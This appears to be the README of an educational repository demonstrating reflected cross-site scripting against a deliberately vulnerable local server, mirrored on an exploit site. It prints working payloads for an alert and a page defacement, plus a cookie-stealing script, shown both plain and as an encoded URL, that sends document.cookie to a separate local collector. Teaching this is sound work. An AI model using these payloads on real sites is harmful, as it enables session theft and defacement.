## https://sploitus.com/exploit?id=9F5830B3-8F2B-5D6E-AA6C-78D37022F213
This repo presents the various types of Cross Site Scripting (XSS) and their dangers. We aim to show that input boxes must always be sanitised correctly.
# Reflected XSS
To run the Reflected XSS you must first start the server by running:
`python3 vulnerable_reflected.py`
To see that we can execute any type of code we first can show an alert to the user by pasting in the search bar:
`alert('XSS PoC Code Executed!');`
We can also deface the website:
`document.body.innerHTML = 'Your system has been infected with Laughter Malware!';document.body.style.backgroundColor = 'red';document.body.style.textAlign = 'center';`
We can also try to steal cookies by starting the cookie monster that steals non-HttpOnly cookies:
`python3 cookie_monster.py`
The URL is:
`http://127.0.0.1:5000/search?q=%3C%2Fstrong%3E%3Cscript%3Efetch%28%27http%3A%2F%2F127.0.0.1%3A8080%2F%3Fc%3D%27+%2B+document.cookie%29%3B%3C%2Fscript%3E%3Cstrong%3E`
The URL was obtained by copying the URL from the browser after adding the script in the search bar:
`fetch('http://127.0.0.1:8080/?c=' + document.cookie);`
# Stored XSS